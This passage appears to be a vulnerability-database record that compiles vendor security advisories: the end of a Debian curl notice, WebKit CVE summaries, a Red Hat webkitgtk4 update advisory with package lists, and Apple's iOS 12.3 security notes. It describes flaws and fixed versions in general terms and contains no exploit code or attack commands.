proxy and TLS 1.3, libcurl could confuse session tickets arriving from the HTTPS proxy as if they arrived from the remote server instead. This could allow an HTTPS proxy to trick libcurl into using the wrong session ticket for the host and thereby circumvent the server TLS certificate check. For the stable distribution (buster), these problems have been fixed in version 7.64.0-4+deb10u2. We recommend that you upgrade your curl packages. For the detailed security status of curl please refer to its security tracker page at: https://security-tracker.debian.org/tracker/curl Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/ Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEBsId305pBx+F583DbwzL4CFiRygFAmBkQCoACgkQbwzL4CFi Ryg6Gg/+LqhhJ8+D7skevVkYzxHzdH2yT/XMeoYp0D37yHmEfH9PyjXwfplG+XEw /xwFRBK8qxD1ja+rQddYyeTvi1OMnMgMS3UsRHlfeMnLxh2+oHnvHDYG848npUEZ Rq4YFoc/n9YTAJZP/G4oiuBeXqH2Sqa5hSNT6VrYfRciCxkYnzA78b85KpI8aYyR lhfiJMNpwrqDbt/QzblpELBkGMIV402VeiqDwHfcVzm2E810xXQNLvPMbWtvDYkA TSrNsdqfuFr1tuQSZY6CGSWEyXtB/tOo8+pvUixlJMBWJMl5TXEcJkD5ckehx0yb C3n9yapfklxHiG9lD4zwwIJDqd3Y4SxdDiSlUC4OhdvpwniMygX0S3ICaPA4iac/ cWanml0Fop3OmRy+vQURTd3sADoT5HoRSUXZVU+HdTrRaEt2xs5okZkWSd3yr4Ux i+HgjUAFkkk8DLRB68Bbpx1LGxFGQT7L8yd4wsWINXlzASIP1A5dnNfE5w0VWOHG 3KDq47wNfjuiZC8GXW+HQCxz5MijnS8Y/Egl0OozNFDwEitNBZEsIjpZaZBdZIwi UFfcK7+u/y/TRY54rA4erkdcHFwpYW5EZVGdb7Z+WPWVlzw0ImXrM68LSAhHQaqW 1Hx4VwwwTsMIPnrx2kriRiiDPOW1r5Kip3yHa+QZLedSRGibQWk= =001T -----END PGP SIGNATURE-----
var-201912-0616 Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12. Processing maliciously crafted web content may lead to arbitrary code execution. Apple From iCloud for Windows An update for has been released.The expected impact depends on each vulnerability, but can be affected as follows: * Arbitrary code execution * Privilege escalation * information leak. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple Safari. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of RenderBlockFlow objects. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. WebKit is prone to a information-disclosure and multiple memory-corruption vulnerabilities. Failed exploit attempts will likely cause a denial-of-service condition. Apple iOS, etc. are all products of Apple (Apple). Apple iOS is an operating system developed for mobile devices. Apple tvOS is a smart TV operating system. Apple macOS Mojave is a dedicated operating system developed for Mac computers. A resource management error vulnerability exists in the WebKit component of several Apple products. The following products and versions are affected: Apple iOS prior to 12.3; macOS Mojave prior to 10.14.5; tvOS prior to 12.3; Windows-based iCloud prior to 10.4, prior to 7.12; Windows-based iTunes prior to 12.9.5; Safari versions earlier than 12.1.1. WebKitGTK and WPE WebKit prior to version 2.24.1 failed to properly apply configured HTTP proxy settings when downloading livestream video (HLS, DASH, or Smooth Streaming), an error resulting in deanonymization. This issue was corrected by changing the way livestreams are downloaded. (CVE-2019-6237) WebKitGTK and WPE WebKit prior to version 2.24.1 are vulnerable to address bar spoofing upon certain JavaScript redirections. An attacker could cause malicious web content to be displayed as if for a trusted URI. This is similar to the CVE-2018-8383 issue in Microsoft Edge. (CVE-2019-8601) An out-of-bounds read was addressed with improved input validation. (CVE-2019-8644) A logic issue existed in the handling of synchronous page loads. (CVE-2019-8689) A logic issue existed in the handling of document loads. (CVE-2019-8719) This fixes a remote code execution in webkitgtk4. No further details are available in NIST. This issue is fixed in watchOS 6.1. This issue is fixed in watchOS 6.1. This issue is fixed in watchOS 6.1. (CVE-2019-8766) "Clear History and Website Data" did not clear the history. The issue was addressed with improved data deletion. This issue is fixed in macOS Catalina 10.15. A user may be unable to delete browsing history items. (CVE-2019-8768) An issue existed in the drawing of web page elements. Visiting a maliciously crafted website may reveal browsing history. (CVE-2019-8769) This issue was addressed with improved iframe sandbox enforcement. (CVE-2019-8846) WebKitGTK up to and including 2.26.4 and WPE WebKit up to and including 2.26.4 (which are the versions right prior to 2.28.0) contains a memory corruption issue (use-after-free) that may lead to arbitrary code execution. (CVE-2020-10018) A use-after-free flaw exists in WebKitGTK. A malicious website may be able to cause a denial of service. A DOM object context may not have had a unique security origin. A file URL may be incorrectly processed. (CVE-2020-3885) A race condition was addressed with additional validation. An application may be able to read restricted memory. (CVE-2020-3901) An input validation issue was addressed with improved input validation. (CVE-2020-3902). Installation note: Safari 12.1.1 may be obtained from the Mac App Store. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 ==================================================================== Red Hat Security Advisory Synopsis: Moderate: webkitgtk4 security, bug fix, and enhancement update Advisory ID: RHSA-2020:4035-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2020:4035 Issue date: 2020-09-29 CVE Names: CVE-2019-6237 CVE-2019-6251 CVE-2019-8506 CVE-2019-8524 CVE-2019-8535 CVE-2019-8536 CVE-2019-8544 CVE-2019-8551 CVE-2019-8558 CVE-2019-8559 CVE-2019-8563 CVE-2019-8571 CVE-2019-8583 CVE-2019-8584 CVE-2019-8586 CVE-2019-8587 CVE-2019-8594 CVE-2019-8595 CVE-2019-8596 CVE-2019-8597 CVE-2019-8601 CVE-2019-8607 CVE-2019-8608 CVE-2019-8609 CVE-2019-8610 CVE-2019-8611 CVE-2019-8615 CVE-2019-8619 CVE-2019-8622 CVE-2019-8623 CVE-2019-8625 CVE-2019-8644 CVE-2019-8649 CVE-2019-8658 CVE-2019-8666 CVE-2019-8669 CVE-2019-8671 CVE-2019-8672 CVE-2019-8673 CVE-2019-8674 CVE-2019-8676 CVE-2019-8677 CVE-2019-8678 CVE-2019-8679 CVE-2019-8680 CVE-2019-8681 CVE-2019-8683 CVE-2019-8684 CVE-2019-8686 CVE-2019-8687 CVE-2019-8688 CVE-2019-8689 CVE-2019-8690 CVE-2019-8707 CVE-2019-8710 CVE-2019-8719 CVE-2019-8720 CVE-2019-8726 CVE-2019-8733 CVE-2019-8735 CVE-2019-8743 CVE-2019-8763 CVE-2019-8764 CVE-2019-8765 CVE-2019-8766 CVE-2019-8768 CVE-2019-8769 CVE-2019-8771 CVE-2019-8782 CVE-2019-8783 CVE-2019-8808 CVE-2019-8811 CVE-2019-8812 CVE-2019-8813 CVE-2019-8814 CVE-2019-8815 CVE-2019-8816 CVE-2019-8819 CVE-2019-8820 CVE-2019-8821 CVE-2019-8822 CVE-2019-8823 CVE-2019-8835 CVE-2019-8844 CVE-2019-8846 CVE-2019-11070 CVE-2020-3862 CVE-2020-3864 CVE-2020-3865 CVE-2020-3867 CVE-2020-3868 CVE-2020-3885 CVE-2020-3894 CVE-2020-3895 CVE-2020-3897 CVE-2020-3899 CVE-2020-3900 CVE-2020-3901 CVE-2020-3902 CVE-2020-10018 CVE-2020-11793 ==================================================================== 1. Summary: An update for webkitgtk4 is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - noarch, ppc64, s390x Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - noarch 3. Description: WebKitGTK+ is port of the WebKit portable web rendering engine to the GTK+ platform. These packages provide WebKitGTK+ for GTK+ 3. The following packages have been upgraded to a later upstream version: webkitgtk4 (2.28.2). (BZ#1817144) Security Fix(es): * webkitgtk: Multiple security issues (CVE-2019-6237, CVE-2019-6251, CVE-2019-8506, CVE-2019-8524, CVE-2019-8535, CVE-2019-8536, CVE-2019-8544, CVE-2019-8551, CVE-2019-8558, CVE-2019-8559, CVE-2019-8563, CVE-2019-8571, CVE-2019-8583, CVE-2019-8584, CVE-2019-8586, CVE-2019-8587, CVE-2019-8594, CVE-2019-8595, CVE-2019-8596, CVE-2019-8597, CVE-2019-8601, CVE-2019-8607, CVE-2019-8608, CVE-2019-8609, CVE-2019-8610, CVE-2019-8611, CVE-2019-8615, CVE-2019-8619, CVE-2019-8622, CVE-2019-8623, CVE-2019-8625, CVE-2019-8644, CVE-2019-8649, CVE-2019-8658, CVE-2019-8666, CVE-2019-8669, CVE-2019-8671, CVE-2019-8672, CVE-2019-8673, CVE-2019-8674, CVE-2019-8676, CVE-2019-8677, CVE-2019-8678, CVE-2019-8679, CVE-2019-8680, CVE-2019-8681, CVE-2019-8683, CVE-2019-8684, CVE-2019-8686, CVE-2019-8687, CVE-2019-8688, CVE-2019-8689, CVE-2019-8690, CVE-2019-8707, CVE-2019-8710, CVE-2019-8719, CVE-2019-8720, CVE-2019-8726, CVE-2019-8733, CVE-2019-8735, CVE-2019-8743, CVE-2019-8763, CVE-2019-8764, CVE-2019-8765, CVE-2019-8766, CVE-2019-8768, CVE-2019-8769, CVE-2019-8771, CVE-2019-8782, CVE-2019-8783, CVE-2019-8808, CVE-2019-8811, CVE-2019-8812, CVE-2019-8813, CVE-2019-8814, CVE-2019-8815, CVE-2019-8816, CVE-2019-8819, CVE-2019-8820, CVE-2019-8821, CVE-2019-8822, CVE-2019-8823, CVE-2019-8835, CVE-2019-8844, CVE-2019-8846, CVE-2019-11070, CVE-2020-3862, CVE-2020-3864, CVE-2020-3865, CVE-2020-3867, CVE-2020-3868, CVE-2020-3885, CVE-2020-3894, CVE-2020-3895, CVE-2020-3897, CVE-2020-3899, CVE-2020-3900, CVE-2020-3901, CVE-2020-3902, CVE-2020-10018, CVE-2020-11793) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For detailed information on changes in this release, see the Red Hat Enterprise Linux 7.9 Release Notes linked from the References section. 4. Solution: For details on how to apply this update, which includes the changes described in this advisory, refer to: https://access.redhat.com/articles/11258 5. Package List: Red Hat Enterprise Linux Client (v. 7): Source: webkitgtk4-2.28.2-2.el7.src.rpm x86_64: webkitgtk4-2.28.2-2.el7.i686.rpm webkitgtk4-2.28.2-2.el7.x86_64.rpm webkitgtk4-debuginfo-2.28.2-2.el7.i686.rpm webkitgtk4-debuginfo-2.28.2-2.el7.x86_64.rpm webkitgtk4-jsc-2.28.2-2.el7.i686.rpm webkitgtk4-jsc-2.28.2-2.el7.x86_64.rpm Red Hat Enterprise Linux Client Optional (v. 7): noarch: webkitgtk4-doc-2.28.2-2.el7.noarch.rpm x86_64: webkitgtk4-debuginfo-2.28.2-2.el7.i686.rpm webkitgtk4-debuginfo-2.28.2-2.el7.x86_64.rpm webkitgtk4-devel-2.28.2-2.el7.i686.rpm webkitgtk4-devel-2.28.2-2.el7.x86_64.rpm webkitgtk4-jsc-devel-2.28.2-2.el7.i686.rpm webkitgtk4-jsc-devel-2.28.2-2.el7.x86_64.rpm Red Hat Enterprise Linux ComputeNode (v. 7): Source: webkitgtk4-2.28.2-2.el7.src.rpm x86_64: webkitgtk4-2.28.2-2.el7.i686.rpm webkitgtk4-2.28.2-2.el7.x86_64.rpm webkitgtk4-debuginfo-2.28.2-2.el7.i686.rpm webkitgtk4-debuginfo-2.28.2-2.el7.x86_64.rpm webkitgtk4-jsc-2.28.2-2.el7.i686.rpm webkitgtk4-jsc-2.28.2-2.el7.x86_64.rpm Red Hat Enterprise Linux ComputeNode Optional (v. 7): noarch: webkitgtk4-doc-2.28.2-2.el7.noarch.rpm x86_64: webkitgtk4-debuginfo-2.28.2-2.el7.i686.rpm webkitgtk4-debuginfo-2.28.2-2.el7.x86_64.rpm webkitgtk4-devel-2.28.2-2.el7.i686.rpm webkitgtk4-devel-2.28.2-2.el7.x86_64.rpm webkitgtk4-jsc-devel-2.28.2-2.el7.i686.rpm webkitgtk4-jsc-devel-2.28.2-2.el7.x86_64.rpm Red Hat Enterprise Linux Server (v. 7): Source: webkitgtk4-2.28.2-2.el7.src.rpm ppc64: webkitgtk4-2.28.2-2.el7.ppc.rpm webkitgtk4-2.28.2-2.el7.ppc64.rpm webkitgtk4-debuginfo-2.28.2-2.el7.ppc.rpm webkitgtk4-debuginfo-2.28.2-2.el7.ppc64.rpm webkitgtk4-jsc-2.28.2-2.el7.ppc.rpm webkitgtk4-jsc-2.28.2-2.el7.ppc64.rpm ppc64le: webkitgtk4-2.28.2-2.el7.ppc64le.rpm webkitgtk4-debuginfo-2.28.2-2.el7.ppc64le.rpm webkitgtk4-devel-2.28.2-2.el7.ppc64le.rpm webkitgtk4-jsc-2.28.2-2.el7.ppc64le.rpm webkitgtk4-jsc-devel-2.28.2-2.el7.ppc64le.rpm s390x: webkitgtk4-2.28.2-2.el7.s390.rpm webkitgtk4-2.28.2-2.el7.s390x.rpm webkitgtk4-debuginfo-2.28.2-2.el7.s390.rpm webkitgtk4-debuginfo-2.28.2-2.el7.s390x.rpm webkitgtk4-jsc-2.28.2-2.el7.s390.rpm webkitgtk4-jsc-2.28.2-2.el7.s390x.rpm x86_64: webkitgtk4-2.28.2-2.el7.i686.rpm webkitgtk4-2.28.2-2.el7.x86_64.rpm webkitgtk4-debuginfo-2.28.2-2.el7.i686.rpm webkitgtk4-debuginfo-2.28.2-2.el7.x86_64.rpm webkitgtk4-devel-2.28.2-2.el7.i686.rpm webkitgtk4-devel-2.28.2-2.el7.x86_64.rpm webkitgtk4-jsc-2.28.2-2.el7.i686.rpm webkitgtk4-jsc-2.28.2-2.el7.x86_64.rpm webkitgtk4-jsc-devel-2.28.2-2.el7.i686.rpm webkitgtk4-jsc-devel-2.28.2-2.el7.x86_64.rpm Red Hat Enterprise Linux Server Optional (v. 7): noarch: webkitgtk4-doc-2.28.2-2.el7.noarch.rpm ppc64: webkitgtk4-debuginfo-2.28.2-2.el7.ppc.rpm webkitgtk4-debuginfo-2.28.2-2.el7.ppc64.rpm webkitgtk4-devel-2.28.2-2.el7.ppc.rpm webkitgtk4-devel-2.28.2-2.el7.ppc64.rpm webkitgtk4-jsc-devel-2.28.2-2.el7.ppc.rpm webkitgtk4-jsc-devel-2.28.2-2.el7.ppc64.rpm s390x: webkitgtk4-debuginfo-2.28.2-2.el7.s390.rpm webkitgtk4-debuginfo-2.28.2-2.el7.s390x.rpm webkitgtk4-devel-2.28.2-2.el7.s390.rpm webkitgtk4-devel-2.28.2-2.el7.s390x.rpm webkitgtk4-jsc-devel-2.28.2-2.el7.s390.rpm webkitgtk4-jsc-devel-2.28.2-2.el7.s390x.rpm Red Hat Enterprise Linux Workstation (v. 7): Source: webkitgtk4-2.28.2-2.el7.src.rpm x86_64: webkitgtk4-2.28.2-2.el7.i686.rpm webkitgtk4-2.28.2-2.el7.x86_64.rpm webkitgtk4-debuginfo-2.28.2-2.el7.i686.rpm webkitgtk4-debuginfo-2.28.2-2.el7.x86_64.rpm webkitgtk4-devel-2.28.2-2.el7.i686.rpm webkitgtk4-devel-2.28.2-2.el7.x86_64.rpm webkitgtk4-jsc-2.28.2-2.el7.i686.rpm webkitgtk4-jsc-2.28.2-2.el7.x86_64.rpm webkitgtk4-jsc-devel-2.28.2-2.el7.i686.rpm webkitgtk4-jsc-devel-2.28.2-2.el7.x86_64.rpm Red Hat Enterprise Linux Workstation Optional (v. 7): noarch: webkitgtk4-doc-2.28.2-2.el7.noarch.rpm These packages are GPG signed by Red Hat for security. References: https://access.redhat.com/security/cve/CVE-2019-6237 https://access.redhat.com/security/cve/CVE-2019-6251 https://access.redhat.com/security/cve/CVE-2019-8506 https://access.redhat.com/security/cve/CVE-2019-8524 https://access.redhat.com/security/cve/CVE-2019-8535 https://access.redhat.com/security/cve/CVE-2019-8536 https://access.redhat.com/security/cve/CVE-2019-8544 https://access.redhat.com/security/cve/CVE-2019-8551 https://access.redhat.com/security/cve/CVE-2019-8558 https://access.redhat.com/security/cve/CVE-2019-8559 https://access.redhat.com/security/cve/CVE-2019-8563 https://access.redhat.com/security/cve/CVE-2019-8571 https://access.redhat.com/security/cve/CVE-2019-8583 https://access.redhat.com/security/cve/CVE-2019-8584 https://access.redhat.com/security/cve/CVE-2019-8586 https://access.redhat.com/security/cve/CVE-2019-8587 https://access.redhat.com/security/cve/CVE-2019-8594 https://access.redhat.com/security/cve/CVE-2019-8595 https://access.redhat.com/security/cve/CVE-2019-8596 https://access.redhat.com/security/cve/CVE-2019-8597 https://access.redhat.com/security/cve/CVE-2019-8601 https://access.redhat.com/security/cve/CVE-2019-8607 https://access.redhat.com/security/cve/CVE-2019-8608 https://access.redhat.com/security/cve/CVE-2019-8609 https://access.redhat.com/security/cve/CVE-2019-8610 https://access.redhat.com/security/cve/CVE-2019-8611 https://access.redhat.com/security/cve/CVE-2019-8615 https://access.redhat.com/security/cve/CVE-2019-8619 https://access.redhat.com/security/cve/CVE-2019-8622 https://access.redhat.com/security/cve/CVE-2019-8623 https://access.redhat.com/security/cve/CVE-2019-8625 https://access.redhat.com/security/cve/CVE-2019-8644 https://access.redhat.com/security/cve/CVE-2019-8649 https://access.redhat.com/security/cve/CVE-2019-8658 https://access.redhat.com/security/cve/CVE-2019-8666 https://access.redhat.com/security/cve/CVE-2019-8669 https://access.redhat.com/security/cve/CVE-2019-8671 https://access.redhat.com/security/cve/CVE-2019-8672 https://access.redhat.com/security/cve/CVE-2019-8673 https://access.redhat.com/security/cve/CVE-2019-8674 https://access.redhat.com/security/cve/CVE-2019-8676 https://access.redhat.com/security/cve/CVE-2019-8677 https://access.redhat.com/security/cve/CVE-2019-8678 https://access.redhat.com/security/cve/CVE-2019-8679 https://access.redhat.com/security/cve/CVE-2019-8680 https://access.redhat.com/security/cve/CVE-2019-8681 https://access.redhat.com/security/cve/CVE-2019-8683 https://access.redhat.com/security/cve/CVE-2019-8684 https://access.redhat.com/security/cve/CVE-2019-8686 https://access.redhat.com/security/cve/CVE-2019-8687 https://access.redhat.com/security/cve/CVE-2019-8688 https://access.redhat.com/security/cve/CVE-2019-8689 https://access.redhat.com/security/cve/CVE-2019-8690 https://access.redhat.com/security/cve/CVE-2019-8707 https://access.redhat.com/security/cve/CVE-2019-8710 https://access.redhat.com/security/cve/CVE-2019-8719 https://access.redhat.com/security/cve/CVE-2019-8720 https://access.redhat.com/security/cve/CVE-2019-8726 https://access.redhat.com/security/cve/CVE-2019-8733 https://access.redhat.com/security/cve/CVE-2019-8735 https://access.redhat.com/security/cve/CVE-2019-8743 https://access.redhat.com/security/cve/CVE-2019-8763 https://access.redhat.com/security/cve/CVE-2019-8764 https://access.redhat.com/security/cve/CVE-2019-8765 https://access.redhat.com/security/cve/CVE-2019-8766 https://access.redhat.com/security/cve/CVE-2019-8768 https://access.redhat.com/security/cve/CVE-2019-8769 https://access.redhat.com/security/cve/CVE-2019-8771 https://access.redhat.com/security/cve/CVE-2019-8782 https://access.redhat.com/security/cve/CVE-2019-8783 https://access.redhat.com/security/cve/CVE-2019-8808 https://access.redhat.com/security/cve/CVE-2019-8811 https://access.redhat.com/security/cve/CVE-2019-8812 https://access.redhat.com/security/cve/CVE-2019-8813 https://access.redhat.com/security/cve/CVE-2019-8814 https://access.redhat.com/security/cve/CVE-2019-8815 https://access.redhat.com/security/cve/CVE-2019-8816 https://access.redhat.com/security/cve/CVE-2019-8819 https://access.redhat.com/security/cve/CVE-2019-8820 https://access.redhat.com/security/cve/CVE-2019-8821 https://access.redhat.com/security/cve/CVE-2019-8822 https://access.redhat.com/security/cve/CVE-2019-8823 https://access.redhat.com/security/cve/CVE-2019-8835 https://access.redhat.com/security/cve/CVE-2019-8844 https://access.redhat.com/security/cve/CVE-2019-8846 https://access.redhat.com/security/cve/CVE-2019-11070 https://access.redhat.com/security/cve/CVE-2020-3862 https://access.redhat.com/security/cve/CVE-2020-3864 https://access.redhat.com/security/cve/CVE-2020-3865 https://access.redhat.com/security/cve/CVE-2020-3867 https://access.redhat.com/security/cve/CVE-2020-3868 https://access.redhat.com/security/cve/CVE-2020-3885 https://access.redhat.com/security/cve/CVE-2020-3894 https://access.redhat.com/security/cve/CVE-2020-3895 https://access.redhat.com/security/cve/CVE-2020-3897 https://access.redhat.com/security/cve/CVE-2020-3899 https://access.redhat.com/security/cve/CVE-2020-3900 https://access.redhat.com/security/cve/CVE-2020-3901 https://access.redhat.com/security/cve/CVE-2020-3902 https://access.redhat.com/security/cve/CVE-2020-10018 https://access.redhat.com/security/cve/CVE-2020-11793 https://access.redhat.com/security/updates/classification/#moderate https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/7.9_release_notes/index 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2020 Red Hat, Inc. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 APPLE-SA-2019-5-13-1 iOS 12.3 iOS 12.3 is now available and addresses the following: AppleFileConduit Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to execute arbitrary code with system privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2019-8593: Dany Lisiansky (@DanyL931) Contacts Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A malicious application may be able to read restricted memory Description: An input validation issue was addressed with improved input validation. CVE-2019-8598: Omer Gull of Checkpoint Research CoreAudio Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Processing a maliciously crafted movie file may lead to arbitrary code execution Description: An out-of-bounds read was addressed with improved input validation. CVE-2019-8585: riusksk of VulWar Corp working with Trend Micro's Zero Day Initiative Disk Images Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A malicious application may be able to read restricted memory Description: An out-of-bounds read was addressed with improved bounds checking. CVE-2019-8560: Nikita Pupyshev of Bauman Moscow State Technological University Kernel Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A malicious application may be able to execute arbitrary code with system privileges Description: A use after free issue was addressed with improved memory management. CVE-2019-8605: Ned Williamson working with Google Project Zero Kernel Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A local user may be able to cause unexpected system termination or read kernel memory Description: An out-of-bounds read was addressed with improved bounds checking. CVE-2019-8576: Brandon Azad of Google Project Zero, unho Jang and Hanul Choi of LINE Security Team Kernel Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to cause unexpected system termination or write kernel memory Description: A type confusion issue was addressed with improved memory handling. CVE-2019-8591: Ned Williamson working with Google Project Zero Lock Screen Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A person with physical access to an iOS device may be able to see the email address used for iTunes Description: A logic issue was addressed with improved restrictions. CVE-2019-8599: Jeremy Peña-Lopez (aka Radio) of the University of North Florida Mail Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Processing a maliciously crafted message may lead to a denial of service Description: An input validation issue was addressed with improved input validation. CVE-2019-8626: Natalie Silvanovich of Google Project Zero Mail Message Framework Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A remote attacker may be able to cause arbitrary code execution Description: A use after free issue was addressed with improved memory management. CVE-2019-8613: Natalie Silvanovich of Google Project Zero MobileInstallation Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A local user may be able to modify protected parts of the file system Description: A validation issue existed in the handling of symlinks. CVE-2019-8568: Dany Lisiansky (@DanyL931) MobileLockdown Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A malicious application may be able to gain root privileges Description: An input validation issue was addressed with improved input validation. CVE-2019-8637: Dany Lisiansky (@DanyL931) Photos Storage Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A sandboxed process may be able to circumvent sandbox restrictions Description: An access issue was addressed with additional sandbox restrictions. CVE-2019-8617: an anonymous researcher SQLite Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to gain elevated privileges Description: An input validation issue was addressed with improved memory handling. CVE-2019-8577: Omer Gull of Checkpoint Research SQLite Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A maliciously crafted SQL query may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved input validation. CVE-2019-8600: Omer Gull of Checkpoint Research SQLite Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A malicious application may be able to read restricted memory Description: An input validation issue was addressed with improved input validation. CVE-2019-8598: Omer Gull of Checkpoint Research SQLite Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A malicious application may be able to elevate privileges Description: A memory corruption issue was addressed by removing the vulnerable code. CVE-2019-8602: Omer Gull of Checkpoint Research Status Bar Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: The lock screen may show a locked icon after unlocking Description: The issue was addressed with improved UI handling. CVE-2019-8630: Jon M. Morlan StreamingZip Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A local user may be able to modify protected parts of the file system Description: A validation issue existed in the handling of symlinks. CVE-2019-8568: Dany Lisiansky (@DanyL931) sysdiagnose Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to execute arbitrary code with system privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2019-8574: Dayton Pidhirney (@_watbulb) of Seekintoo (@seekintoo) WebKit Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Processing maliciously crafted web content may result in the disclosure of process memory Description: An out-of-bounds read was addressed with improved input validation. CVE-2019-8607: Junho Jang and Hanul Choi of LINE Security Team WebKit Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2019-6237: G. Geshev working with Trend Micro Zero Day Initiative, Liu Long of Qihoo 360 Vulcan Team CVE-2019-8571: 01 working with Trend Micro's Zero Day Initiative CVE-2019-8583: sakura of Tencent Xuanwu Lab, jessica (@babyjess1ca_) of Tencent Keen Lab, and dwfault working at ADLab of Venustech CVE-2019-8584: G. Geshev of MWR Labs working with Trend Micro Zero Day Initiative CVE-2019-8586: an anonymous researcher CVE-2019-8587: G. Geshev working with Trend Micro Zero Day Initiative CVE-2019-8594: Suyoung Lee and Sooel Son of KAIST Web Security & Privacy Lab and HyungSeok Han and Sang Kil Cha of KAIST SoftSec Lab CVE-2019-8595: G. Geshev from MWR Labs working with Trend Micro Zero Day Initiative CVE-2019-8596: Wen Xu of SSLab at Georgia Tech CVE-2019-8597: 01 working with Trend Micro Zero Day Initiative CVE-2019-8601: Fluoroacetate working with Trend Micro's Zero Day Initiative CVE-2019-8608: G. Geshev working with Trend Micro Zero Day Initiative CVE-2019-8609: Wen Xu of SSLab, Georgia Tech CVE-2019-8610: Anonymous working with Trend Micro Zero Day Initiative CVE-2019-8611: Samuel Groß of Google Project Zero CVE-2019-8615: G. Geshev from MWR Labs working with Trend Micro's Zero Day Initiative CVE-2019-8619: Wen Xu of SSLab at Georgia Tech and Hanqing Zhao of Chaitin Security Research Lab CVE-2019-8622: Samuel Groß of Google Project Zero CVE-2019-8623: Samuel Groß of Google Project Zero CVE-2019-8628: Wen Xu of SSLab at Georgia Tech and Hanqing Zhao of Chaitin Security Research Lab Wi-Fi Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A device may be passively tracked by its WiFi MAC address Description: A user privacy issue was addressed by removing the broadcast MAC address. CVE-2019-8620: David Kreitschmann and Milan Stute of Secure Mobile Networking Lab at Technische Universität Darmstadt Additional recognition Clang We would like to acknowledge Brandon Azad of Google Project Zero for their assistance. CoreFoundation We would like to acknowledge Vozzie and Rami and m4bln, Xiangqian Zhang, Huiming Liu of Tencent's Xuanwu Lab for their assistance. Kernel We would like to acknowledge Brandon Azad of Google Project Zero and an anonymous researcher for their assistance. MediaLibrary We would like to acknowledge Angel Ramirez and Min (Spark) Zheng, Xiaolong Bai of Alibaba Inc. for their assistance. MobileInstallation We would like to acknowledge Yiğit Can YILMAZ (@yilmazcanyigit) for their assistance. Safari We would like to acknowledge Ben Guild (@benguild) for their assistance. Installation note: This update is available through iTunes and Software Update on your iOS device, and will not appear in your computer's Software Update application, or in the Apple Downloads site. Make sure you have an Internet connection and have installed the latest version of iTunes from https://www.apple.com/itunes/ iTunes and Software Update on the device will automatically check Apple's update server on its weekly schedule. When an update is detected, it is downloaded and the option to be installed is presented to the user when the iOS device is docked. We recommend applying the update immediately if possible. Selecting Don't Install will present the option the next time you connect your iOS device. The automatic update process may take up to a week depending on the day that iTunes or the device checks for updates. You may manually obtain the update via the Check for Updates button within iTunes, or the Software Update on your device. To check that the iPhone, iPod touch, or iPad has been updated: * Navigate to Settings * Select General * Select About. The version after applying this update will be "iOS 12.3". Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- iQJdBAEBCABHFiEEDNXJVNCJJEAVmJdZeC9tht7TK3EFAlzZrUopHHByb2R1Y3Qt 